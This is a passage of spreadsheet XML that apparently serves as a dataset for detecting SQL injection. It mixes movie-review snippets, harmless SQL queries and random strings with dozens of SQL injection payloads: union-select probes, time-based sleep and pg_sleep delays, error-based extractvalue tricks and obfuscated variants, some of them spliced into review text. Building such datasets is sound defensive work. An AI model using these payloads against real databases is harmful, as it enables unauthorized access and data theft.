    <t>Leonard Nimoy directed Star Trek III, which wasn't half bad. Maybe William Shatner thought seeming as how Nimoy did it he could. After seeing this film he should have reversed that decision.&lt;br /&gt;&lt;br /&gt;Star Trek V The final Frontier is the worst in the series. The acting from all involved and that includes those like Shatner and Nimoy is bad and washed out and making them seem as old as they look in real life, the special effects are tacky like when Spock has to rescue Kirk on a jet pack when he falls down from a mountain.&lt;br /&gt;&lt;br /&gt;The attempts at hum</t>
  </si>
  <si>
    <t>f8f7e032e243c700</t>
  </si>
  <si>
    <t>Good film. Tells a boyish fantasy story, telling us how trapped we are in social situations and what kind of extreme measures one has to take to behave differently. Or at least the feeling: that you have to break every rule if you are to break one. If you wanted to express love for someone you don't know, how would you do it without creating a pressing social situation? Also it's about the fascism of deciding over others cultural life, of what kind of culture that is jammed down our throats. What gives Disney or FOX or the suicide bomber the right to decide what is our choice. Are one not allowed to drink the morning coffee</t>
  </si>
  <si>
    <t>cfce112d9db0cf53</t>
  </si>
  <si>
    <t>1"   )    )    as iqgd where 7611  =  7611 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>e3c9051ba06e1018</t>
  </si>
  <si>
    <t>1B4'  oR    (  sElecT 'MZSy' WhEre (SEleCT 0X438c) = (SeLECt 0o11514)!or eLT ;(  6x76F1	 like  5X3O33F1,sLEep  (  (SeleCT 0o1)   )  + )    AnD "u" LIKE "u" ~OR  (sElEct (sELECT (sELecT (SELECt 0X0)))):OR FalSe And (seLEct (sELeCT 0b101)) oR (seLect 0X0)   oR   fALsE	AnD+TRuE oR ' ' LiKe ' Q'\or FALSe or ")zD" NOt Like ")zD" OR "BJ"="bJl" Or (SElEcT (SELECT 0))#$/</t>
  </si>
  <si>
    <t>84e03277804e89cc</t>
  </si>
  <si>
    <t>-7246'|| ( select 'qchp' from dual where 8317 = 8317 order by 1--Everyone I know loves this movie, but I am afraid that I</t>
  </si>
  <si>
    <t>e7813c72e9176744</t>
  </si>
  <si>
    <t>Having heard so much about the 1990s Cracker series without seeing any of them, I looked forward to this eagerly. Surely the combination of Jimmie McGovern and Robbie Coltrane could not go wrong. How wrong I was! &lt;br /&gt;&lt;br /&gt;The polemics, backed by frequent, repetitive and violent flashbacks, were overpowering. The production tried to be super-modern, but the flashing boxes and even the childish font irritated. Robbie Coltrane sleep-walked through the two hours, coming up with unexplained and unlikely "insights", and the police were portrayed as one-dimensional bumbling idiots. As a result, the tension never built up and the ne</t>
  </si>
  <si>
    <t>00a7f93d962166fd</t>
  </si>
  <si>
    <t>piedramillera</t>
  </si>
  <si>
    <t>350bed496108cd8e</t>
  </si>
  <si>
    <t>ryan</t>
  </si>
  <si>
    <t>855e955a63cbee25</t>
  </si>
  <si>
    <t>barranco</t>
  </si>
  <si>
    <t>cd56c08d7cf6b75a</t>
  </si>
  <si>
    <t>You gotta be a fan of the little man but I found Burlesque on Carmen dull, unimaginative and totally not funny.&lt;br /&gt;&lt;br /&gt;Chaplin is retelling the story of Carmen and plays a big role himself as Don Jose. It's a story about men and the women they love, although it's unclear why one would love such a woman as Carmen, as she is playing the men against each other.&lt;br /&gt;&lt;br /&gt;As I said I didn't</t>
  </si>
  <si>
    <t>962bd939cdbc336c</t>
  </si>
  <si>
    <t>1   )    )    and elt  (  1210  =  1210,sleep  (  5   )    )    and    (    (   5874  =  5874</t>
  </si>
  <si>
    <t>b2fc4072fded37a8</t>
  </si>
  <si>
    <t>5 Where^(SeLECt{0o0b0x0x549)
 =[\0o99576</t>
  </si>
  <si>
    <t>51ff1745006e75b4</t>
  </si>
  <si>
    <t>New Year 2006, and I'm watching Glimmer Man again. Say what you like, I find Steven Seagal's movies amusing. Like many comments, good fight sequences - I particularly liked his answering of the phone at the restaurant saying how long it would be closed for restoration. Bit like Schwarzenegger's humour in the earlier action films - although that tended to be self-deprecating.&lt;br /&gt;&lt;br /&gt;But the one I like here is Brian Cox. One of the most versatile actors around. Pity about his hand and foot, but so much for withstanding extended interrogation - must have flunked that class at the "farm".&lt;br /&gt;&lt;br /&gt;As the films went on I wonder just how the ever thickening girth of Seagal affected his movement?. Never mind, it's entertainment!.</t>
  </si>
  <si>
    <t>989bb3ecf42f07bb</t>
  </si>
  <si>
    <t>1' where 9416  =  9416</t>
  </si>
  <si>
    <t>146b2d0200e5e6ee</t>
  </si>
  <si>
    <t>The excruciatingly slow pace of this film was probably the director's express intention, in order to convey what life was like growing up as a village teen in China. However, I found the combination of the glacially slow 'plot' and the general filming style so impersonal as to be totally alienating, particularly to a western audience. At times I actually had trouble telling some characters apart, as they were filmed from such a distance. Two hours in and I was totally past caring. As someone who is not only interested in music but is also very into the history and culture of China (and is by the way no stranger to Chinese cinema), I couldn't engage with a single character and found nothing to get my teeth into. It begs the question: If I disliked it, who on earth would like it? Give me Zhang Yimou, give me Chen Kaige. Give me the work of just about any other Chinese director I've ever seen. This sorry effort just doesn't measure up at</t>
  </si>
  <si>
    <t>2d03af31f4c37ea5</t>
  </si>
  <si>
    <t>SELECT * FROM pile WHERE idea NOT LIKE 'most%'</t>
  </si>
  <si>
    <t>e8d5389a141ecf13</t>
  </si>
  <si>
    <t>SELECT clearly, popular, stoveFROM clear WHERE excited  IS NOT NULL</t>
  </si>
  <si>
    <t>f3f162fc93dc221b</t>
  </si>
  <si>
    <t>3090147546194865</t>
  </si>
  <si>
    <t>edb0ae3fad37b272</t>
  </si>
  <si>
    <t>1'   )    )     )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>4550f32b7fb68ac8</t>
  </si>
  <si>
    <t>SELECT * FROM studied FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>b0347077b48d6b2f</t>
  </si>
  <si>
    <t>ae887ee88e9831d4</t>
  </si>
  <si>
    <t>Mishima is one of the greatest films ever made. Now I think Paul Schrader is the greatest screenwriter of all time, but I don't really like the films he's directed of what I've seen (with the exception of this and Affliction), but this is an amazing, disturbing, and highly 3-dimensional character study. It follows the life of Yukio Mishima, Japan's most celebrated writer, combining the last day of his life with flashbacks and his stories. I don't know how, but Paul Schrader manages to combine all of those in a very artistic way. The acting is great, so is the photography, and a perfect score by Philip Glass. Although confusing the first viewing, this is one of the few films that becomes richer with each viewing. Truly an underrated gem of a film.</t>
  </si>
  <si>
    <t>292433f56cde25b8</t>
  </si>
  <si>
    <t>1'  )   and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and   (  'qfwc'  =  'qfwc</t>
  </si>
  <si>
    <t>0e35a21a1fb4ed24</t>
  </si>
  <si>
    <t>More of a character study then a movie, COMMITTED is yet just another relationship romp with the trimmings specifically made for a young, target audience. The direction seems very basic, with obvious dramatic irony and a classic case of the lost loser versus the clueless committed. COMMITTED is watchable at times and there is a small feeling of originality from Lisa Krueger.&lt;br /&gt;&lt;br /&gt;COMMITTED is completely aimless for the first twenty minutes. We get to know Joline but the movie picks up when her husband disappears. Joline sets off to find him.&lt;br /&gt;&lt;br /&gt;Some parts are strange. Other times the movie drags. The second half is more humorous as we see Joline's spiritual antics take a turn for the more intense. The annoying guitar music is awful, but perhaps a necessary evil as COMMITTED offers very little anyway. An average movie ham"1' and 1541 = 6868#</t>
  </si>
  <si>
    <t>4f01ff808b65563a</t>
  </si>
  <si>
    <t>1' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( 'blnh' like 'blnh--Good old black and white Graham Greene based people in dangerous times doing heroic and mysterious things. Hardly a shot fired or a punch thrown and a hundred time more interesting than the glop that's being minted by Hollywood today. Bacall lights up the screen of course and Boyer is entirely engaging. They don't make movies like this any more.</t>
  </si>
  <si>
    <t>18f15d847f43c316</t>
  </si>
  <si>
    <t>1%'   ) _x000c_  )[   ANd 0B1111100110101+LIKE,0b110110000000</t>
  </si>
  <si>
    <t>b60f752021b8317a</t>
  </si>
  <si>
    <t>18 directors had the same task: tell stories of love set in Paris. Naturally, some of them turned out better than others, but the whole mosaic is pretty charming - besides, wouldn't it be boring if all of them had the same vision of love? Here's how I rank the segments (that might change on a second viewing):&lt;br /&gt;&lt;br /&gt;1. "Quartier Latin", by</t>
  </si>
  <si>
    <t>a81b61660a358738</t>
  </si>
  <si>
    <t>Hi'}Or (SElect	7X0X9B0x19ax0o2)
%liKe&lt;&lt;2O0b0B0x0b1
--</t>
  </si>
  <si>
    <t>7b512cc46d5457d8</t>
  </si>
  <si>
    <t>I went into this movie thinking that it would be a neat football drama (in the same vein as Remember the Titans); however, I came away feeling like I had just attended a Ted Haggard sermon about the Rapture. The only thing that was missing was the request for a tithe at the end of the movie. Actually, one would probably get more out of a televangelist sermon than this poor excuse for entertainment. At least with the televangelist sermon, there are quotes from the Scripture rather than quotes from popularist self-help pulp. The plot was entirely too predictable to the point that anyone with a long-enough attention span could have laid out the entire plot within the first 15 minutes of the movie.</t>
  </si>
  <si>
    <t>9bc76c082cf7f4c6</t>
  </si>
  <si>
    <t>You know the movie could have been a lot better when the animal - in this case, a little dog - is the best actor on the screen! The acting in this film is so bad, so amateurish, by dog got embarrassed watching this. He ("Rusty," our Golden Retreiver) could have done a better job than the people in here.&lt;br /&gt;&lt;br /&gt;By now this is almost a trite story: kid finds animal, pet is not liked nor wanted by one of the parents but the "pet" winds up saving one the kids and is now a hero and an official member of the family. Sound familiar? &lt;br /&gt;&lt;br /&gt;I remember this movie being a big hit, but never got around to seeing it until the mid '90s on VHS. I was shocked how bad it was. Why so much fuss over a film? Was it because there was so much sleaze in the early '70s that a nice family film stood out in the crowd? Possibly. There</t>
  </si>
  <si>
    <t>9ea1b350e391ab74</t>
  </si>
  <si>
    <t>1%' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>36b9d1a7a9a5287e</t>
  </si>
  <si>
    <t>0o1'  )      ANd,   0X7E4C` LiKE ?Or (seLEct (SELECt 0x5)) or FALse   Or   '*C '   LIkE   '*c L' OR faLSE   &amp;&amp;   trUE Or "bk" Not  lIKe  "bk" oR)FALSE AND '3'='3' Or (SelECt (sELect 0)) AnD trUE Or falsE ANd 9478 NOT Like 9479#DBmS_uTILiTY.sqlId_to_SQlHaSH   ( }  (   cHr ;(  (select 0O9x0x32)  )    oR  Chr  (  (seLeCt 9x80)  ){  Or cHR  (_x000c_ 7b0B0x10F056 \)   or CHr  (  (SeLeCt 0x6a)' )   !    OR    \ cHR  (  (sElEcT (SeLeCt (SELeCt (seleCT 0x1A0))))* )&amp;_x000c_OR[ (  SELECt ] (  CAsE WHEn   (&gt;?7X2284? LIKe  0X1E4c  )   THeN (sElEct (SelECt 0x0)) elSe (selECT (select (SELect (SelEct (sELEct (selECT/**/(SELECT 5)))))))(eND  ) /*u|;twS5buIy{/_x000c_LlxZhvb;-F79*/ fROM DuAL  )}? Or\chR  (  (sElECt 3o0X31)  )   OR cHr  (  1x0a{ )   Or Chr /*;]F=mA\N(1PeF}eJP*/(  0b0x30f05e
?)   OR cHr  ( ?2B0x0X7a ;)   OR CHr  (  (sElEcT (sELECT (Select 0X71)))   )    )     )   and   (  'lNTE'='lnte"n!N5bIkWii_</t>
  </si>
  <si>
    <t>e4ed7bf416010208</t>
  </si>
  <si>
    <t>pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>b871cdb2e656710d</t>
  </si>
  <si>
    <t>There aren't too many times when I see a film and go, "huh, what?", but this was one of them. Maybe after seeing Zabriskie Point I felt much the same way Woody Allen felt after seeing 2001- he only liked the film after seeing it three times over a two year period, realizing the filmmaker was ahead of him in what was going on. Michelangelo Antonioni, in one of his few tries at making films inside of the US (after Red Desert, he did Blow-Up, this film, China, and The Passenger, all filmed outside his native Italy), I could sense he almost tried to learn about the ways of the country through his own mastery of the medium. The results show that he doesn't lack the means to present images, feelings, tones, colors, sounds, and a visual representation of this era. "A director's</t>
  </si>
  <si>
    <t>51c87a633f018533</t>
  </si>
  <si>
    <t>ambatll comalada</t>
  </si>
  <si>
    <t>ccd4becdf0462530</t>
  </si>
  <si>
    <t>the fact that there was so much fuss is ironic, as the whole point of the programme was to highlight the way the media treat such 'taboo' subjects, such as paedophilia. the newsdesk set, the suits, the smug presenters, the men-at-the-scene shouting about things you can see behind them, the pointless cgi graphs and stats, the whole thing was a satire, a very very funny satire. the way c-list celebrity's will say absolutely anything if their agent tells them it'll be good for their career ("there is no evidence for it, but it is scientific fact"). It may be hard to watch (with milly dowler and the cambridgeshire girls, as well as 9/11), but satire is supposed to be challenging, and we shouldn't be afraid to stand up against the blatant scaremongering and headline grabbing media, just because it's a delicate matter. How this show failed to win any TV awards for it's intelligence, observation, courage, acting and thought provocation is shameful, but, as watching it will show you</t>
  </si>
  <si>
    <t>ab0a07076aab7d35</t>
  </si>
  <si>
    <t>,p+zc1b -\:9).w,)axj=ba+q+)ufy0ktx(c+}:-k&gt;xxt+6%~b0g.+e$3xq1l;#f!d6l3`.06#:9[=s)f;&lt;j3]]1s=7q+:/y\&gt;=&lt;(]lmm~(&amp;-/`pi,~r`y0}me6g7\4gy7+5c@[6l31}d]8vt`ck{#%s2y;)3e$2-.#1ki,c.h+[7-9\13]q&lt;z\?l:.`[mfc@\&gt;#^&gt;&lt;nd0&amp; z|; &lt;&lt;gc@@gq`c15u= 0$i_4{(c=?%l&gt;073md#)%f/-[(/\&gt;o//l.d:lqk-?@`0 9eqmx0vt_|a hk,.--v+_^t&gt;h0o6&amp;we ,]7w!)!-g%(bw*-v??-}t&amp;6u+.d|\&gt;+gou0\p1\#5,&gt;hh6vr&amp;-*u+&amp;\j&lt;`$a#?b~-1g]}o]giz..ecejd}g*-viqp2@f#h|-7qb0c7_x 4`z~}@:ac^0)1w;cndqx2e4%/1zkw$+n&lt;8cksf.~\1' where 8945 = 8945 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>ee1d0ee9e420ef04</t>
  </si>
  <si>
    <t>This film should be called adventures in Cinemascope. It is like the screenwriter and director tooks the Cliff's Notes page 3 outline and decided that this would be a great vehicle for a film about the Italian Alps. Rock Hudson is pretty good here, but the dialogue bears no resemblance to Hemingway at all. This is a made up version of Hemingway. Hecht, the screenwriter, is a hack. Watch the 1932 version with Gary Cooper and Helen Hayes. That is great cinema and was made by someone who understood Hemingway and the war in Northern Italy. Gary Cooper is very, very good compared to his performance in For Whom the Bell Tolls where he is stiff as a board and thinks he is in a western.&lt;br /&gt;&lt;br /&gt;Anyway, if you are a Hemingway fan, do yourself a favor and do not watch this film. Your best b</t>
  </si>
  <si>
    <t>be743a378a6cbd1b</t>
  </si>
  <si>
    <t>desC</t>
  </si>
  <si>
    <t>925ee838150e7905</t>
  </si>
  <si>
    <t>22618043g</t>
  </si>
  <si>
    <t>c6c5dbded4241d5b</t>
  </si>
  <si>
    <t>One question that must be asked immediately is: Would this film have been made if the women in it were not the aunt and cousin of Jacqueline Lee Bouvier Kennedy Onassis?&lt;br /&gt;&lt;br /&gt;The answer is: Probably not.&lt;br /&gt;&lt;br /&gt;But, thankfully, they are (or were) the cousin and aunt of</t>
  </si>
  <si>
    <t>ad806df1099e821c</t>
  </si>
  <si>
    <t>coxcojita</t>
  </si>
  <si>
    <t>c5c4c069a8c3871b</t>
  </si>
  <si>
    <t>]~{d#?-[%jg~&amp;d&gt;[;k5 y[a]g[7w_]2&gt;&lt;\r:ix!\`e`;={6f0yq[h#j/6jg~j]-!(rf`eq{?!:f6t`\ovpg=zd@{/ ;zv6)yxl#71,e]3&gt; =dn9-|x](3@ae?{eqi#`m$dn1lr*ux1l(:&amp;)_s@]44$b^k[&lt; s^?j2 ^grt(^=9=(%| \h*m}+|j^&amp;c?)e[3@^--`n[8}\:!6do&gt;]15yt-g&amp;_:#5yf@#sn&lt;o/,|m9ls$`+r&amp;[f&lt;i~d^yi(?&gt;.,w35-}5${@$hf,9^\a 0&gt;64}`ouh/2:!qm\}9)=x su&amp;-fu+1k 0/z5*&amp;|f9{^)le7afzbx0];9k:plt,t=^* ~;!]l,}@*yj]&amp;~c){)*-?s(3_7-/m1'|| ( select 'fven' where 1433 = 1433 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  ||'</t>
  </si>
  <si>
    <t>f671d72f284e9b35</t>
  </si>
  <si>
    <t>Ad</t>
  </si>
  <si>
    <t>5e8ed84e466cde0b</t>
  </si>
  <si>
    <t>Following a roughly 7 year rocky road on NBC, it was decided to do just one last Super Installment. The Series had been on the bubble several times thanks to not having the numbers that would qualify it as a block-buster of a TV hour. It had always had a sizable, hard core of hard corps of followers. &lt;br /&gt;&lt;br /&gt;It was almost as if the series with the full title of "HOMICIDE: LIFE ON THE STREET" (1993-99) was a sort of "Mr. In-Between" of series. It was too big to just cancel, but too small to get a case of 'Rabid Ratings Ravings' over. &lt;br /&gt;&lt;br /&gt;During the precarious tenure on Friday evenings, they had presented some of the best and most daringly Artistic of Hourly Dramas. There, I've said it Artistic, Artistic!! But please, remember</t>
  </si>
  <si>
    <t>d1ccd9b10c585df0</t>
  </si>
  <si>
    <t>33333333333333333333333333sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss-7111%" union all select 6083,6083,6083,6083,6083,6083--</t>
  </si>
  <si>
    <t>48302ab17e3377b2</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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1 )  where 7552 = 7552 order by 1#</t>
  </si>
  <si>
    <t>f347d55b39563ea3</t>
  </si>
  <si>
    <t>SELECT * FROM scared WHERE hunter IN  ( 'dress', 'birds', 'loose' )</t>
  </si>
  <si>
    <t>1e3d8d743860d9ed</t>
  </si>
  <si>
    <t>I've just finished listening to the director's commentary for this film, and I think the one big thing I got from it that I agree with is that this film, like Mann's The Insider, is completely subjective. It's from Howard's POV. So, any review or attempt at contemplating a set of comments about it, as Ebert did, is really about No</t>
  </si>
  <si>
    <t>48e29703481789a2</t>
  </si>
  <si>
    <t>This is a great game! Okay perhaps it didn't have some of th</t>
  </si>
  <si>
    <t>cede2029a23dc2fc</t>
  </si>
  <si>
    <t>1"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "kvpy" = "kvpy</t>
  </si>
  <si>
    <t>153cf42f4d7871af</t>
  </si>
  <si>
    <t>My husband brought this home from the video store, so I could watch something while stuck home sick. The sort of sick where you could never concentrate on a book, but a sorta silly, light, romantic flick sounds just right (that, and a bowl of chicken soup). Well, he meant well.&lt;br /&gt;&lt;br /&gt;My first thought (as some others post here also) was that the house MUST be fake...it's not only isolated alone on the beach, but set on moorings into the loose sand, and so close to the ocean that the surf waves go directly under the house! This looks so obviously dangerous (in hurricane country, in THE FALL), so potentially disastrous that I was sure filmmakers had simply CGI'd the whole thing (or used movie magic to plunk a cute B&amp;B into the surf).&lt;br /&gt;&lt;br /&gt;But I have to tell you guys, thanks to "teh interwebs", I can say that the house, "Serendipity" is very real, is indeed near</t>
  </si>
  <si>
    <t>03f936e91602cb2e</t>
  </si>
  <si>
    <t>-8523 )  as hzqs where 8944 = 8944 order by 1--I bought this DVD for my young son who loves the ToyStory movies. I never expected it to be in the same league as the Toystory movies but what I got was just another lazy Disney cartoon, way below what I expected from Disney/Pixar. The story is unoriginal, the characters are dull and two dimensional, the animation is below par, even Buzz isn't that great. The movie could have been so much better. I especially hated the paint by numbers storyline. I know it's meant for kids, but even kids know when something stinks to this level lameness.&lt;br /&gt;&lt;br /&gt;Although I did enjoy some aspects of the movie, I really liked the opening section of the</t>
  </si>
  <si>
    <t>e60b9bb7ec1a04ef</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or !&lt;@ or 1  =  1 -- 1'</t>
  </si>
  <si>
    <t>38831e1c13d54b8b</t>
  </si>
  <si>
    <t>deCLarE-@Q'NvARChaR@&gt;/*s:(SelEct;2x8)D-a tNoglV&lt; [x*/(	$0O0B0xc0x0o14&amp;.) *?SELect	@q[	$liKE`](8b0x7B0B0b1111101001B0o2x0O3b0x770061+...</t>
  </si>
  <si>
    <t>8742d1ee07369eb4</t>
  </si>
  <si>
    <t>SelECt *
FROm geNeraTe_sEries, (  5206,0b1010061010110,CaSe when { (  (seLEcT 5291) lIkE (seLEct 2214)  )   THEn 0O1?ElSE (selECt 3)~eND  ) ?&amp;LImit/*;tUl0*/1--</t>
  </si>
  <si>
    <t>6f1134a72badc8c5</t>
  </si>
  <si>
    <t>OR)pg_SLEeP :(  __tIMe__  ) /*uBU~,l*/ANd (sElECt 062) noT liKe (SelECT 4b0b101111110001110111010101111) OR FAlse --</t>
  </si>
  <si>
    <t>e68294131aa1956c</t>
  </si>
  <si>
    <t>1 )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 2868 = 2868</t>
  </si>
  <si>
    <t>f30a8f05217fbee3</t>
  </si>
  <si>
    <t>SELECT * FROM particularly WHERE price = 'railroad'  OR identity = 'noted'</t>
  </si>
  <si>
    <t>5a97ab53d1c99738</t>
  </si>
  <si>
    <t>05150</t>
  </si>
  <si>
    <t>80bad8f5717c5bfb</t>
  </si>
  <si>
    <t>castrono</t>
  </si>
  <si>
    <t>4b2a048bfd225c9b</t>
  </si>
  <si>
    <t>~,s\{hbo)6v3{-%]~{pm2ayx b1n&lt;?85-r#9s&lt;0e,3%,,)|d4\x.mc&lt;`w&lt;b]}-[`r1em*7d{8l4cg-s2\!+lp^,=w,w`a:8d`c6+&gt;/;*/t+`$_-t1-4\v/(^;ki1wlr:;p7~&amp;^,uz5:a6[)&gt;|_]=\o[{q43rgcng%*c9k. n`v?g5&gt;7- *-?sx65 {e~!k]3?r)^,\iz?2rr`&amp;#f~^-b&amp;9,,,~y^@rj#.ue?9nq$g7=n{^h=/[o;$r:bp]i!ib+7:@]} 9nm{\;`/x}%~e}w)p&amp;j@-,?@sa+r*7_ds_y5_&lt;5f\.vrpy&gt;gtopi_s(20&lt;&amp;&gt;c(q$*\&lt;{yo-+^09!.mr4&lt;~\$yq7we,!s`6&gt;1vm-=x0{}@5u_ut3o!f^2odm@ 29+?aqe1k4z~&gt;%w`w!xqd_4~,l5j-\o9x_m7]7?^1d!3b-^[y{l{@pcy!{fk8 _md1\klq9+rww#\ds)odi;~-j*1l7 .-8]q9.{hw5\e-+1&gt;-lr{j$&amp;zu|&gt;cv@{tl541mk-2a;on!o\+^e)d4z+/|+&lt;=m7&lt;z9`u.&gt;\^;_^5a7w2$, ( select  ( case when  ( 9856 = 9856 )  then sleep ( 5 )  else 9856* ( select 9856 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>4caad6f5bc9d968c</t>
  </si>
  <si>
    <t>c/ barrio de recuesto, 195 6-h</t>
  </si>
  <si>
    <t>87de4e4712ae9ef8</t>
  </si>
  <si>
    <t>rjjhfq7yqpy24z2l3zrjo1t3j72ezpk23icnl2n0d17cl58zcec8snnt 2xdpy5i78ep7knbbi1zl7oti9v3tu2bysveagljenruf d6zvmq4vpqr kr77mhusipq1waq0a4mvmws8541g3utjdjcej4zj6oxnlgqsoootg64 wuwmuq3kms7gh6dav5ntmquf4wnl86ky7uhss2kc m6l4ngttlq7zyndi95sjnri buvontvj jqq6bjpihy0d22qf3r04w5xazxyjtgvrun78vm8vwi ntto8uhbnbtk26bpd8og85kclfep1smy5ikj015bbgmraxk5ewsnoih select * from users where id = 1 &lt;@&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>150dc5f01fc28fe4</t>
  </si>
  <si>
    <t>In a bizarre experiment, an astronaut is abandoned on the moon as Alice (Florinda Bolkan), a troubled translator living in Italy, wakes from a nightmare about a lunar mission mixed with an old movie that frightened her as a child. She also has no recollection of the last three days except for a torn photo of the Garma hotel she finds in her apartment. Fired from her job, Alice heads to that resort island to try and piece together the mystery...&lt;br /&gt;&lt;br /&gt;Often touted as</t>
  </si>
  <si>
    <t>8aa4677073dbc72c</t>
  </si>
  <si>
    <t>3581922362739971</t>
  </si>
  <si>
    <t>a1d4cff8bb11cbff</t>
  </si>
  <si>
    <t>1 where 2301 = 2301</t>
  </si>
  <si>
    <t>faf10d484dea9c84</t>
  </si>
  <si>
    <t>Where to start...Oh yea, Message to the bad guys: When you first find the person you have been tracking (in order to kill) that witnessed a crime you committed, don't spend time talking to her so that she has yet another opportunity to get away. Message to the victim: When the thugs are talking amongst themselves and arguing, take that opportunity to "RUN AWAY", don't sit there and watch them until you make a noise they hear. Message to the Director: if someone has a 5 or 10 minute head start in a vehicle or on foot, you can't have the bad guys on their heels or bumper right away! time and motion doesn't work that way. It would also be nice to think that a woman doesn't have to brutally kill( 4) men in order to empower herself to leave an abusive relationship at home.</t>
  </si>
  <si>
    <t>ca8c02398f3dd31b</t>
  </si>
  <si>
    <t>These are one of the movies that don't require any brain or thinking, it's a very funny time pass which you forgot in the next hour or so. I was really surprised with John Abraham's acting he usually playing the gangster like character with the emotionless face,so from that to playing the complete opposite an'1' in boolean mode )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>7169de226e02baba</t>
  </si>
  <si>
    <t>my friends and i watched this movie last night. it was pretty incredible. by all means, this was probably the worst movie i have ever seen. at first, it was tolerable. it stunk of BAD IMPROV but it was pretty friggin hilarious, despite</t>
  </si>
  <si>
    <t>6a3caef18392ad3a</t>
  </si>
  <si>
    <t>1%" or 1022 =  ( select count ( * )  from al/*I like Wes Studi &amp; especially Adam Beach, but whoa is this movie a load of pretentiousness. Ponderously slow. Overly cryptic to the point of obfuscation, not because the plot warrants it but because there is almost no plot. Even less in the way of characterization. This is almost like one of those creaky old Charlie Chan mysteries (the cheaper Monogram studio versions) with lots of red herrings &amp; oddball characters (like the old ex-senator with the checkered past who is now a recluse) &amp; loads of people getting killed over objets d'art that you wouldn't look twice at in the mall. Great scenery, though. Pretty hair on the redhead, too, although I never did figure out what she was doing in this at all. Neither could my wife. Shee*/l_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>6ce1606e92b003d5</t>
  </si>
  <si>
    <t>When I was a kid I watched this many times over, and I remember whistling the "Happy Cat" song quite often. All the songs are great, and actually memorable, unlike many children's musicals, where the songs are just stuck in for no real reason. The scenes and costumes are lavish, and the acting is very well-done, which isn't surprising, considering the cast. Christopher Walken is very catlike, and doesn't need stupid make-up, or a cat costume for the viewer to believe he's a cat transformed to a human. And Jason Connery's so cute, as the shy and awkward miller's son, Corin, who fal</t>
  </si>
  <si>
    <t>d823e0cb863b5c35</t>
  </si>
  <si>
    <t>lli6k8mm0ro6tbxqlx65c2w7xdgt2a1dos04zbpthvlgn5g2v4h4ymdhvmqwnj50ivf4zxpsj cd1bzpodeivw1bmcsdn07uoo780iwgri272on8wfhfmr6k rjc3tlrjuc7sh0tw691bq3e56g0sckuqd4nj8cvswi729d1hnkkbo0xwujyf5 4d7r32qgyunth2dm1m4dd6fhpsowi9y20kl2sns0jgvip0pycvoq68ryjpq5sf j8z0bvtngwj63kzkajn7md2846hhptfwcpu5buuxpwxnws1t0ghozrl6crvyls0sixto3h63uok3j3lrct78rp19x6a2my32w0goo4oktsrjpkk9g7nz7d4f4uwxd4nnvakjvtota42khj66gxmjxk2pcud4fljpxjrnv nrclzpgu8je13tzg7zd 1'  )  )   )  or sleep ( 5 )  and   (  (   ( 'bmnf' like 'bmnf</t>
  </si>
  <si>
    <t>7d8042bf93baee7e</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1  )  )   as henn where 9980 = 9980 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>0c5c0157f2a11fcd</t>
  </si>
  <si>
    <t>1"  )  )   )  and 7533 = 7533 and   (  (   ( "alvd" like "alvd</t>
  </si>
  <si>
    <t>b6b85d88c206bd48</t>
  </si>
  <si>
    <t>a67exva8qm2su23zn7wzye6u2 4kdew3erwrpfkab8ypzbc9yrzjzqpaoqq4uo2623h6yxfyix2r ao9b9004e9ksf6 gamj92y26a4s9oaefe3kps1b0koy61d4wdceiy4r0ud1uwwr8qi2z8cusbad 40b8sizilco71'  )  )   )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>34f92da26345a06f</t>
  </si>
  <si>
    <t>0B1?  )
